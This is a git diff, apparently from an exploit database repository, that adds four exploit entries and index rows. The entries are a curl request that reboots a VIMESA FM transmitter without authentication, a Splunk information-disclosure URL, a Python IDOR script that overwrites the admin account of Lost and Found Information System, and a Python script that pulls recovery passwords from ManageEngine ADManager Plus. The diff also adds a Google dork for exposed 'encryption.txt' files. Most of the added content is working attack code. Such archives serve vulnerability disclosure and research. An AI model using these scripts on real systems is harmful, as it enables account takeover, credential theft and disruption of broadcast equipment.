diff --git a/exploits/hardware/dos/51793.txt b/exploits/hardware/dos/51793.txt new file mode 100644 index 000000000..4154866b1 --- /dev/null +++ b/exploits/hardware/dos/51793.txt @@ -0,0 +1,60 @@ +VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service + + +Vendor: Video Medios, S.A. (VIMESA) +Product web page: https://www.vimesa.es +Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5 + +Summary: The transmitter Blue Plus is designed with all +the latest technologies, such as high efficiency using +the latest generation LDMOS transistor and high efficiency +power supplies. We used a modern interface and performance +using a color display with touch screen, with easy management +software and easy to use. The transmitter is equipped with +all audio input including Audio IP for a complete audio +interface. The VHF/FM transmitter 30-1000 is intended +for the transmission of frequency modulated broadcasts +in mono or stereo. It work with broadband characteristics +in the VHF frequency range from 87.5-108 MHz and can be +operated with any frequency in this range withoug alignment. +The transmitter output power is variable between 10 and 110% +of the nominal Power. It is available with different remote +control ports. It can store up to six broadcast programs +including program specific parameters such as frequency, +RF output power, modulation type, RDS, AF level and deviation +limiting. The transmitter is equipped with a LAN interface +that permits the complete remote control of the transmitter +operation via SNMP or Web Server. + +Desc: The device is suffering from a Denial of Service (DoS) +vulnerability. An unauthenticated attacker can issue an +unauthorized HTTP GET request to the unprotected endpoint +'doreboot' and restart the transmitter operations. + +Tested on: lighttpd/1.4.32 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5798 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php + + +22.07.2023 + +-- + + +$ curl -v "http://192.168.3.11:5007/doreboot" +* Trying 192.168.3.11:5007... +* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0) +> GET /doreboot HTTP/1.1 +> Host: 192.168.3.11:5007 +> User-Agent: curl/8.0.1 +> Accept: */* +> +* Recv failure: Connection was reset +* Closing connection 0 +curl: (56) Recv failure: Connection was reset \ No newline at end of file diff --git a/exploits/multiple/webapps/51792.txt b/exploits/multiple/webapps/51792.txt new file mode 100644 index 000000000..e73f9dd7d --- /dev/null +++ b/exploits/multiple/webapps/51792.txt @@ -0,0 +1,14 @@ +# Exploit Title: Splunk 9.0.4 - Information Disclosure +# Date: 2023-09-18 +# Exploit Author: Parsa rezaie khiabanloo +# Vendor Homepage: https://www.splunk.com/ +# Version: 9.0.4 +# Tested on: Windows OS + +# Splunk through 9.0.4 allows information disclosure by appending +# /__raw/services/server/info/server-info?output_mode=json to a query, +# as demonstrated by discovering a license key and other information. + +# PoC : + +https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json \ No newline at end of file diff --git a/exploits/php/webapps/51795.py b/exploits/php/webapps/51795.py new file mode 100755 index 000000000..f791c540a --- /dev/null +++ b/exploits/php/webapps/51795.py @@ -0,0 +1,37 @@ +# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over +# Date: 2023-12-03 +# Exploit Author: OR4NG.M4N +# Category : webapps +# CVE : CVE-2023-38965 + +Python p0c : + +import argparse +import requests +import time +parser = argparse.ArgumentParser(description='Send a POST request to the target server') +parser.add_argument('-url', help='URL of the target', required=True) +parser.add_argument('-user', help='Username', required=True) +parser.add_argument('-password', help='Password', required=True) +args = parser.parse_args() + + +url = args.url + '/classes/Users.php?f=save' + + +data = { + 'id': '1', + 'firstname': 'or4ng', + 'middlename': '', + 'lastname': 'Admin', + 'username': args.user, + 'password': args.password +} + +response = requests.post(url, data) +if b"1" in response.content: + print("Exploit ..") + time.sleep(1) + print("User :" + args.user + "\nPassword :" + args.password) +else: + print("Exploit Failed..") \ No newline at end of file diff --git a/exploits/windows/webapps/51794.py b/exploits/windows/webapps/51794.py new file mode 100755 index 000000000..5017935eb --- /dev/null +++ b/exploits/windows/webapps/51794.py @@ -0,0 +1,81 @@ +# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: https://www.manageengine.com/products/ad-manager/ +# Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492 +# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md +# Version: ADManager Plus Build < 7183 +# Tested against: Build 7180 +# CVE: CVE-2023-31492 + +import argparse +import requests +import urllib3 +import sys + +""" +The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. +When deleted user accounts are restored, defined password is set to the user accounts. +Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment. +""" + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def getPass(target, auth, user, password): + with requests.Session() as s: + if auth.lower() == 'admanager': + auth = 'ADManager Plus Authentication' + data = { + "is_admp_pass_encrypted": "false", + "j_username": user, + "j_password": password, + "domainName": auth, + "AUTHRULE_NAME": "ADAuthenticator" + } + # Login + url = target + 'j_security_check?LogoutFromSSO=true' + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", + "Content-Type": "application/x-www-form-urlencoded" + } + req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) + if 'Cookie' in req.request.headers: + print('[+] Authentication successful!') + elif req.status_code == 200: + print('[-] Invalid login name/password!') + sys.exit(0) + else: + print('[-] Something went wrong!') + sys.exit(1) + + # Fetching recovery password + for i in range(1, 6): + print('[*] Trying to fetch recovery password for domainId: %s !' % i) + passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D' + passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False) + if passReq.content: + print(passReq.content) + + +def main(): + arg = get_args() + target = arg.target + auth = arg.auth + user = arg.user + password = arg.password + getPass(target, auth, user, password) + + +def get_args(): + parser = argparse.ArgumentParser( + epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1") + parser.add_argument('-t', '--target', required=True, action='store', help='Target url') + parser.add_argument('-a', '--auth', required=True, action='store', + help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.') + parser.add_argument('-u', '--user', required=True, action='store') + parser.add_argument('-p', '--password', required=True, action='store') + args = parser.parse_args() + return args + + +main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 626b80bc6..e8a509c01 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3227,6 +3227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 26138,exploits/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)",2013-06-12,"Core Security",dos,hardware,554,2013-06-12,2013-06-12,1,CVE-2013-1606;OSVDB-94211,,,,,http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service 22596,exploits/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli & Fabio Annunziato",dos,hardware,,2003-05-08,2012-11-12,1,,,,,,https://www.securityfocus.com/bid/7575/info 28271,exploits/hardware/dos/28271.py,"Vestel TV 42pf9322 - Denial of Service",2013-09-13,HackerSofi,dos,hardware,111,2013-09-13,2013-09-13,0,OSVDB-97456,,,,, +51793,exploits/hardware/dos/51793.txt,"VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service",2024-02-13,LiquidWorm,dos,hardware,,2024-02-13,2024-02-13,0,,,,,, 45776,exploits/hardware/dos/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",dos,hardware,,2018-11-05,2018-11-05,0,,"Denial of Service (DoS)",,,, 24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware,,2004-05-24,2013-01-15,1,CVE-2004-2344;OSVDB-6413,,,,,https://www.securityfocus.com/bid/10411/info 43164,exploits/hardware/dos/43164.py,"Vonage VDV-23 - Denial of Service",2017-11-21,Nu11By73,dos,hardware,,2017-11-21,2017-11-22,0,CVE-2017-16902,,,,, @@ -12193,6 +12194,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,, 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,, 21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,, +51792,exploits/multiple/webapps/51792.txt,"Splunk 9.0.4 - Information Disclosure",2024-02-13,"Parsa Rezaie Khiabanloo",webapps,multiple,,2024-02-13,2024-02-13,0,,,,,, 51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,, 41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,, 40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,, @@ -22681,6 +22683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php,,2008-02-13,2016-11-14,1,OSVDB-41835;CVE-2008-0803;OSVDB-41834;OSVDB-41833;OSVDB-41832;OSVDB-41831;OSVDB-41830;OSVDB-41829;OSVDB-41828;OSVDB-41827;OSVDB-41826;OSVDB-41825;OSVDB-41824;OSVDB-41823;OSVDB-41822;OSVDB-41821;OSVDB-41820;OSVDB-41819;OSVDB-41818;OSVDB-41817;OSVDB-41816;OSVDB-41815;OSVDB-41814;OSVDB-41813;OSVDB-41812;OSVDB-41811;OSVDB-41810;OSVDB-41809;OSVDB-41808,,,,http://www.exploit-db.comlookstrike-v0.9.zip, 26688,exploits/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3988;OSVDB-21328,,,,,https://www.securityfocus.com/bid/15665/info 7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php,,2009-01-27,,1,,,,,, +51795,exploits/php/webapps/51795.py,"Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over",2024-02-13,Or4nG.M4N,webapps,php,,2024-02-13,2024-02-13,0,,,,,, 51570,exploits/php/webapps/51570.py,"Lost and Found Information System v1.0 - SQL Injection",2023-07-06,"Amirhossein Bahramizadeh",webapps,php,,2023-07-06,2023-07-06,0,CVE-2023-33592,,,,, 48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-11-05,1,,,,,, 48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,,2020-10-23,2020-10-23,0,,,,,, @@ -45718,6 +45721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 20353,exploits/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2586;OSVDB-84590,,,http://www.exploit-db.com/screenshots/idlt20500/mailtraq-payload-55.png,, 36960,exploits/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",webapps,windows,8080,2015-05-08,2015-05-08,0,OSVDB-121830,,,,, 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,,2018-08-25,2018-08-25,0,CVE-2018-15608,,,,, +51794,exploits/windows/webapps/51794.py,"ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure",2024-02-13,"Metin Yunus Kandemir",webapps,windows,,2024-02-13,2024-02-13,0,,,,,, 43129,exploits/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",webapps,windows,9090,2017-11-07,2017-11-07,0,CVE-2017-16543;CVE-2017-16542,"SQL Injection (SQLi)",,,, 37395,exploits/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting",2015-06-26,"Suraj Krishnaswami",webapps,windows,,2015-06-26,2015-06-26,0,CVE-2015-2169;OSVDB-123630,,,,, 37059,exploits/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",webapps,windows,,2015-05-18,2016-10-10,1,OSVDB-122270,,,,, diff --git a/ghdb.xml b/ghdb.xml index 5b9e25461..26691c2d1 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -52321,6 +52321,18 @@ attachments 2020-01-21 Marcelo Ruz S. + + 8414 + https://www.exploit-db.com/ghdb/8414 + Files Containing Juicy Info + inurl:* "encryption.txt" + Google dork: inurl:* "encryption.txt" + inurl:* "encryption.txt" + https://www.google.com/search?q=inurl:* "encryption.txt" + + 2024-02-13 + Naved Ansari + 8145 https://www.exploit-db.com/ghdb/8145